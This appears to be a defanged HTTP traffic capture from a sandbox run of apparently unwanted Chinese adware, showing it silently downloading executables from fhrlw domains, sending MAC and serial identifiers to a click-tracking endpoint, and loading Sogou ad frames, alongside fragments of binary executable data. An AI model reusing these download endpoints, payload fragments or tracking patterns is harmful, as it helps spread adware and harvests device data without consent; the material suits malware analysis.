......S.rJ...U.I.=.l"..8<......Y..Q.....y...]r.M`VI..n.B.K.G.-..JX.
<.i......Q......... ..Y{......T.X<..9....?^7s......D#Q.Z...'..!.
.e..S....iD....U}.....4....[V.x?.m.........>b.nRy....'8TXF.U.<..
..O.....Q8..g.%..P.Y...`.N...t.#[email protected]=.qWD.7...x

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=819200-1024000
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 819200-1024000/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:53 GMT
.qb.........d>...Kcp..)`.`.j..X3y4Ei3..|$7.....xN.-/.0:.;.U........
.p......z......L.,.....|..=..3.....Cca^:..;.....'.])....!........%O.Y.
.M.DjK...8.[..QY.G............X.....:Gzc...tv...yu...,3k....Sc.(..hK..
.b..V..q..e...)./p..O....Q.h.......](....V.....L.T.F..\.8}..J.6SB.0...
..U.R..z9`I...[....{.1.`cB.n.c7US...&s..N..Fl.%.?&..........Z....VCr..
d.1 #=<.,.Ir.a.c......N..u%4..|m.I;R.}.......?..!!x....i&.3....X4a*
........F.........W.h.U....Mv0In..^.........a...Q3...$..z..i..W...nVt.
..."p..$.......L.:.V..b...)..*.....\.@4..|....F... .....].?.6r...rF%a.
c*>@*..vUp[..._.I...;.....]...>.N..I..f.....`.wcW..6..9Yp..#..!.
l.k....d..........e..4..!.....n.X.tS.|.A.lW.].`k.6. ~3/6/.[h"w..8..U.#
._......p....A...R.....g.6.-..Qrm..g.....4{.-.$...u?U....9......k...n.
...|.;E....(.>.1Z.\...f8l.n..u2..)....|...E....S.)(...#.....mX.HQ..
z.......Qh-Z..)S).T...([...[{Z(..t.;.a.b...2..............Y..IK ......
...[guE........`|...[[email protected]>N..LKD...!..&j
c..m....`...V3.hB....m...M...J....x..=ehO#.H..HC.._.?...N ...YwP.93...
..,.R6..;...=...{C..m.y4...u.h.......>.{n.....c(...0...r.".KzpR..c.
....0n.....7L^6.j...O....:.K>..!O..".K....x.c.....f.....w[.-....lO8
3.X.. ....P...)..v.C.......v..G.B.... ..........u.5.&....e....Z..y.Onc
N....!,aJ.{.....".....<3.;....Y..W......?...C!........c,.B.0...(s.x
..B.Jb~.7....a.X.......MW.:.X%.y^.@Z..!$:.uG.".Q...`.^<.1.....|.uF.
..O..LazL...TUUY..<d.Q?q...E.y..n...N.%...!.*..a...n6./k.J.M./)....
Lb......&U:o._.h..f.x..vL......fo=.{[email protected]..^..$.:........?Z...

<<< skipped >>>

GET /testgpimg/sogou_icon_short.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p.inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@


HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sat, 14 Jun 2014 09:00:45 GMT
Content-Type: image/png
Content-Length: 3528
Connection: keep-alive
Last-Modified: Wed, 23 Jan 2013 07:16:05 GMT
Expires: Sat, 14 Jun 2014 12:44:54 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
.PNG........IHDR.............2..5....pHYs................MiCCPPhotosho
p ICC profile..x..SwX...>..e.VB....l.."#[email protected]..
..H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.
. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....
ly|B"......I>..................(G$.@..`U.R,......@"......Y.2G.....v
.X..@`...B,.. 8..C.... L..0...._p..H.......K.3.....w....!..l.Ba.).f.."
...#.H..L.........8?......f.l.....k.o">!.........N..._....p...u.k.[
..V.h..][email protected].<......%b..0..>[email protected].@...
...qanv.R....B1n..#......)..4.\,...X..P"M.y.R.D!......2......w....O.N.
...l.~.....X.v.@~.-......g42y.......@ ...........\...L....D..*.A......
........a.D@.$.<.B........A.T.:.............18....\..p..`........A.
..a!:..b.."......"aH4... ...Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u
@.......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v..
..a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._
.H$....N.!%.2I.IkH.H-.S.>..i.L&..m....... ......O.......:...L..$R..
.J5e?....2B...Q.......:.ZIm.vP/S...4u.%...C..-....igi.h/.t.....E....k.
......w......Hb(.k.{...../.L......T0.2..g...oUX*.*|.....:.V.~...TUsU?.
y..T.U..^V}.FU.P.........U..6..RwR.P.Q_.._...c....F..H.Tc....!..2e.XB.
rV..,k.Mb[...Lv...v/{LSCs.f.f.f..q.......9..J.!...{-.-?-..j.f.~.7.z...
b.r......up.@.,..:m:.u..6.Q....u..>.c.y.........G.m..........704.6.
.l18c...c.k.i........h...h..I.'.&..g.5x.>f.o.b.4.e.k<abi2.......
)..k.f....t...,.......9..k.a........E..J.6.....|...M....V>VyV.V

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1024000-1228800
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1024000-1228800/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:57 GMT
...y.5..7.W].n.:.0.......k../6.W..YqR:...|."9...$>^..d..W.Nh.D.>
.$s..ORJ.M..kA...-....P.^.Fu.........|.__u{..~......U.JZ..N.c.i..&..'t
..n.,9..b.h.f{P..}....E..c)........T%A.`.....T...5.......Ei....[.....s
..?...M.L.).....1......gjI0.=...Sz...;..H.S.o. 0'............~.%..&..n
..F..%..R...).x....E..5....Vw.......3;j<{7.5.F.....kT..F.....M....^
...V.q......3.{.yXV.;..y.?..r. 4"......!3J.......,~.M{.....{.....O...f
.....M.9M%..~LY..3H.S..R.i[FN..)...P..8{][email protected]!.aOE.....N E..c.x
%.2f..C.|....".b|..55........D.E........w.`$.`~5...A..3.5..9r..o..4._7
.v.....x.T..(.(.\.4...".......t.......t...V..<[email protected].
...'......Q...7.7M......6....p...8.{6T^"....B$...........S?..1.V....x.
l..j.q19...w..O....;y!Q....H..M)qn.o...&......=.tQ...$:.......)...|.b.
.u)|...g....{..Z.....C..$.zd....&.4... ..?!!..6.4,.?... T.u..}./..^.O.
>...Gy...[.........B......:..A.......ba..%n.3.o.vz..o.5..k....q.n..
.HE.(...}[.......I<g...2...%UP........}.c..............`.U(dT....w.
1.b...\C.f%.,.A.F....v.#.W/...q.F..Zu2...7"..I.....V ..AB.._2T...f....
.'&.~d..`..X;..~4...$....8V.._.........Sj.g..<W.BC...T.Ca.MD.w.Y.=.
.....,3..g_.........p.......z).B`.kL..n]{%#o.[uC,....v......l...\ ..5.
d..L.e...h..../..E.............X.G..0qzN.0..z...S.....nr.p...."U.'....
.2.B...]...o..W.V...h...~..}.^f..x..h.............."X)V....o..CX.m.M.t
.x.E..?...P$8.sIk...!"H...U=`.........xR......9.,o.....P8..{...o.NND..
.~..l.i....e......n.....&h{..=.h^r|g..v.0H...P.M.=\..t.N..i...4.n...0.
c...i.8.."~q.".IyZ.=1...e.=....y.......G.IX.r\p......$).#..N..P.0G

<<< skipped >>>

GET /slience/fhsli_6_12001.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: software.fhrlw.cn
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 335364
Content-Type: application/octet-stream
Last-Modified: Wed, 28 May 2014 05:49:52 GMT
Accept-Ranges: bytes
ETag: "261b13a5387acf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:31 GMT
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1...u...u...
u.......w...u...........d.......|.......t...Richu...................PE
..L.....UH.................b....... ..o5............@.................
.........0...........................................................@
......................................................................
.....................................text...x`.......b................
.. ..`.rdata...............f..............@[email protected]..
[email protected][email protected]....@....
...B..................@..@............................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected][email protected]...\.@
..}..e..9}[email protected]........ M............U....M....3...3..FQ
......3..NU.....M..........VT..U.....FP..E...............E.P.M...H.@..
E...E.P.E.P.u...`[email protected]}[email protected].}.j.W.E..
[email protected][email protected][email protected] [email protected]..
.u....E.P.u...h.@._^3.[.....L$....D...Si.. ..VW.T.....tO.q.3.;5..D.sB.
.i.. ...D.......t.G.....t...O..t .....u...3....3...F.. ..;5..D.r._

<<< skipped >>>

GET /cs/jsfile/js/c.js HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: images.sohu.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Server: FSS
Date: Sat, 14 Jun 2014 08:25:51 GMT
Last-Modified: Mon, 26 May 2014 07:18:20 GMT
Expires: Sat, 14 Jun 2014 09:25:51 GMT
Cache-Control: max-age=3600
Content-Encoding: gzip
FSS-Cache: HIT from 15041145.21594755.22842845
43a.............}.w.8.._Iu.z.Zq.g.;JO....L.6......Y.[.,9..........).I;
..o....... .. ...N.....,.$.....-....[;..T$i#=X.n.&.n._C....7.o..&....t
l.....2......4.|].<a@.<Y...:i-...s..p...q..y..Gyzw.....u...u..a&
lt;.....S.7..4.8....i6G..t...sl#Z..AB=[.jj.......NF9....0;.O.._g..$M..
e.p...!%.}.4......5.O0m..#H|?..nn.k..y.y.....mS.~.'.n.j.K'...Wi..j...}
...B.(...:.m..N..9.A..$.u...Y.....;?..c?-%R..._$I.;.q...*.w...-y.H...i
.....}qI. ..Q.....`n'...'.t.8....&.^.....O....'..Kc#.k...m......jA:..p
.....i.'. ...:Q............g8.......?...O.;}a ..:.......y.%./.%.>a.
DU...OIr..j.....1.Z.4.r.`.....{R~.2.:Q..o...k.gnF../[email protected]^].Y.\$..|
-g...H..WF.%....T..(..g/.s.v....zd.&.$....i..Er.h0i.....F..&........^.
...}.R...."t5.x.m..$...;....%?..U...R...^Co..[.U6....I..%(.'a.....O.I)
%..J..%...{...)......2{~quI...z.$3..$...t.....L.G&1.xF...*~*.........U
F....K..3.....F..D.... ..O.....e.....H].1..L$P..v...OL.O*..~=..h...4K
M..F...w.....m.....or.YV...V..Rw..H1..........;..6..t<gb.h.P.f.\..0
.....U3..g..(.m...&-.0...F...U....'...M.>..'>Z..G1.4...."&b.....
...v........A...R*..0c0..<[email protected]
......4.*.b}.......&....d..b..#/.>*....U"..I.....Y2.J5...-@C..$r...
..`V...5.-5r.....".70.X.d..T....< j..[^[email protected].......?.....
..f........$.s....uy).q.L./0Y...*.8......%.5s.=Rj.D*..2..R...K[<...
t.n...4a.....E.............j..(.i.8.=..a....<...i&....nY-K3y..%.G..
&7.W...w..E..;.g.....3..V.g..;........O.Opz.bk....Z4.Y.AOhR..B.|....K.
...:t>....HV..k..~...>.,s=f....lH.>g....4.....n...*..b...

<<< skipped >>>

GET /client/picchange.css HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img.fhrlw.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 584
Content-Type: text/css
Last-Modified: Thu, 08 May 2014 04:11:16 GMT
Accept-Ranges: bytes
ETag: "fddeeb8e736acf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:24 GMT
html, body, div, dl, dt, dd, ul, ol, li, h1, h2, h3, h4, h5, h6, pre, 
form, fieldset, input, textarea, p, blockquote, th, td {.. margin:
0;.. padding: 0;..}..ol, ul {.. list-style: none outside none;..
}...main{position: relative; width:340px;height: 60px;}...main div{wid
th:100%;overflow:hidden;}...main .adlist{display:none;}...main .sel{di
splay:block;}...showList{position:absolute;bottom:2px;right:0px;}...sh
owList li{float:left;width:8px;height:8px;background:#eaeaea;color:#ea
eaea;margin-right:5px;font-size:0;}...showList li.special{background:#
4384da;color:#4384da;}HTTP/1.1 200 OK..Content-Length: 584..Content-Ty
pe: text/css..Last-Modified: Thu, 08 May 2014 04:11:16 GMT..Accept-Ran
ges: bytes..ETag: "fddeeb8e736acf1:4d6"..Server: Microsoft-IIS/6.0..X-
Powered-By: ASP.NET..Date: Sat, 14 Jun 2014 09:01:24 GMT..html, body,
div, dl, dt, dd, ul, ol, li, h1, h2, h3, h4, h5, h6, pre, form, fields
et, input, textarea, p, blockquote, th, td {.. margin: 0;.. padd
ing: 0;..}..ol, ul {.. list-style: none outside none;..}...main{pos
ition: relative; width:340px;height: 60px;}...main div{width:100%;over
flow:hidden;}...main .adlist{display:none;}...main .sel{display:block;
}...showList{position:absolute;bottom:2px;right:0px;}...showList li{fl
oat:left;width:8px;height:8px;background:#eaeaea;color:#eaeaea;margin-
right:5px;font-size:0;}...showList li.special{background:#4384da;color
:#4384da;}
....

<<< skipped >>>

GET //js/picchange.js HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img.fhrlw.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 908
Content-Type: application/x-javascript
Last-Modified: Thu, 08 May 2014 03:52:46 GMT
Accept-Ranges: bytes
ETag: "eeb3d4f8706acf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:31 GMT
var thisIndex=0;..var bannerLength = $('.main .adlist').length;..for(i
=0; i<bannerLength; i++){...$('.showList li').eq(i).text(i+1);..}..
function ChangePic()..{...indexobj = $('.showList li').eq(thisIndex);.
..$('.showList li').removeClass('special');...indexobj.toggleClass('sp
ecial');...obj = $('.main .adlist').eq(thisIndex);...$('.main div').re
moveClass('sel');...obj.addClass('sel');......thisIndex = thisIndex+1>
=bannerLength? 0 : thisIndex+1;..}.. ..$('.main .adlist').hover(fu
nction(){...window.clearInterval(timer);..},function(){...timer = wind
ow.setInterval( "ChangePic()" , 5000 );..})..$('.showList li').hover
(function(){...window.clearInterval(timer);...thisIndex = parseInt(thi
s.innerHTML) - 1;...ChangePic();..},function(){...timer = window.setIn
terval( "ChangePic()" , 5000 );..})....$(function(){... ...timer =
window.setInterval( "ChangePic()" , 5000 );...ChangePic();..})HTTP/1
.1 200 OK..Content-Length: 908..Content-Type: application/x-javascript
..Last-Modified: Thu, 08 May 2014 03:52:46 GMT..Accept-Ranges: bytes..
ETag: "eeb3d4f8706acf1:4d6"..Server: Microsoft-IIS/6.0..X-Powered-By:
ASP.NET..Date: Sat, 14 Jun 2014 09:01:31 GMT..var thisIndex=0;..var ba
nnerLength = $('.main .adlist').length;..for(i=0; i<bannerLength; i++
){...$('.showList li').eq(i).text(i+1);..}..function ChangePic()..{.
..indexobj = $('.showList li').eq(thisIndex);...$('.showList li').remo
veClass('special');...indexobj.toggleClass('special');...obj = $('.mai
n .adlist').eq(thisIndex);...$('.main div').removeClass('sel');...

<<< skipped >>>

GET /Api/SendClickData.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&date=2014-06-14&clickcount1=0&clickcount2=0&clickcount3=0&clickcount4=0 HTTP/1.1
User-Agent: FhCalendar
Host: client.fhrlw.com


HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:01:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 13
{"errno":"1"}....



GET /ad/fixad.html?id=9995 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: client.fhrlw.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1737
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sat, 14 Jun 2014 09:01:23 GMT
..<style type="text/css">..    body..    {..        margin: 0;..
border: 0;.. }..</style>..<!DOCTYPE html PUBLIC "-
//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DT
D/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999
/xhtml">..<head><title>..</title><meta http-eq
uiv="refresh" content="600" />.. <link href="hXXp://img.fhrlw
.com/client/picchange.css".. rel="stylesheet" type="text/css" /
>.. .. <script src="hXXp://img.fhrlw.com/js/jquery-1.3.2.mi
n.js".. type="text/javascript"></script>.. <script
>.. window.onerror = function() { return true; };.. $(document).
ready(function() {.. $(document).bind("contextmenu", function(
e) {.. return false;.. });.. });.. </scr
ipt>..</head>..<body scroll="no">.. <div class="m
ain">.. <div class="adlist sel"><script type="text/
javascript">.var sogou_ad_id=341269;.var sogou_ad_height=60;.var so
gou_ad_width=460;.</script>.<script type=text/javascript src=
hXXp://images.sohu.com/cs/jsfile/js/c.js></script></div>
<div class="adlist "><script type="text/javascript">.var
sogou_ad_id=341269;.var sogou_ad_height=60;.var sogou_ad_width=460;.<
/script>.<script type=text/javascript src=hXXp://images.sohu.c
om/cs/jsfile/js/c.js></script></div><div class="adli
st "><script type="text/javascript">.var sogou_ad_id=3412

<<< skipped >>>

GET /qi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dspcm.brand.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=DupiSyllll2FXlDElllllVntR87lllllZYr1iZllll9lllllRklll5@@@@@@@@@@


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: YYID =
a2..<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata
=" width="1" height="1" border="0" alt="" style="border:none !importan
t; margin:0px !important;" />..0..HTTP/1.1 200 OK..Server: nginx..D
ate: Sat, 14 Jun 2014 09:00:44 GMT..Content-Type: text/html..Transfer-
Encoding: chunked..Connection: keep-alive..Set-Cookie: YYID =..a2..<
img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" widt
h="1" height="1" border="0" alt="" style="border:none !important; marg
in:0px !important;" />..0..
....



GET /pixel?tid=E0&ver=1&extendata= HTTP/1.1
Accept: */*
Referer: hXXp://dspcm.brand.sogou.com/qi
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@; YYID=
Connection: Keep-Alive
Host: dspcm.brand.sogou.com


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: YYID =
6..hello...0..HTTP/1.1 200 OK..Server: nginx..Date: Sat, 14 Jun 2014 0
9:00:46 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Conn
ection: keep-alive..Set-Cookie: YYID =..6..hello...0..
....



GET /qi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dspcm.brand.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@; YYID=


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: YYID =
a2..<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata
=" width="1" height="1" border="0" alt="" style="border:none !importan
t; margin:0px !important;" />..0..HTTP/1.1 200 OK..Server: nginx..D
ate: Sat, 14 Jun 2014 09:00:47 GMT..Content-Type: text/html..Transfer-
Encoding: chunked..Connection: keep-alive..Set-Cookie: YYID =..a2..<
img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" widt
h="1" height="1" border="0" alt="" style="border:none !important; marg
in:0px !important;" />..0..
....



GET /qi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dspcm.brand.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=vLpiSyllll2FXlDElllllVntR8DlllllZYr1iZllllGlllllRklll5@@@@@@@@@@; YYID=


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: YYID =
a2
<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />
0


GET /ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid= HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:44 GMT
Content-Type: text/plain
Content-Length: 160
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:44 2014
X-XSS-Protection: 0
SOGOU_STAR_SETJSONADSLOT({
"341269" : {
"id":341269,
"w":460,
"h":60,
"m":"MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA-",
"isf":"0",
"cs":"1985823318692344632"
}});



GET /ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=DupiSyllll2FXlDElllllVntR87lllllZYr1iZllll9lllllRklll5@@@@@@@@@@


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:44 GMT
Content-Type: text/html
Content-Length: 7434
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@; path=/; expires=Mon, 14 Jul 2014 09:00:44 GMT; domain=.sogou.com
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:44 2014
X-XSS-Protection: 0
<html>
<head>
<title></title>
<style>
<!--
body{margin:0;background-color:transparent;}
.sogou{width:460px;height:60px;position:relative;overflow:hidden;}
a.logo{display:block;height:18px;width:26px;text-align:justify;letter-spacing:20px;text-decoration:none;overflow:hidden;cursor:default;position:absolute;bottom:0px;right:0px;}
.sogou a.logo{filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png) no-repeat left top;_background:none;}
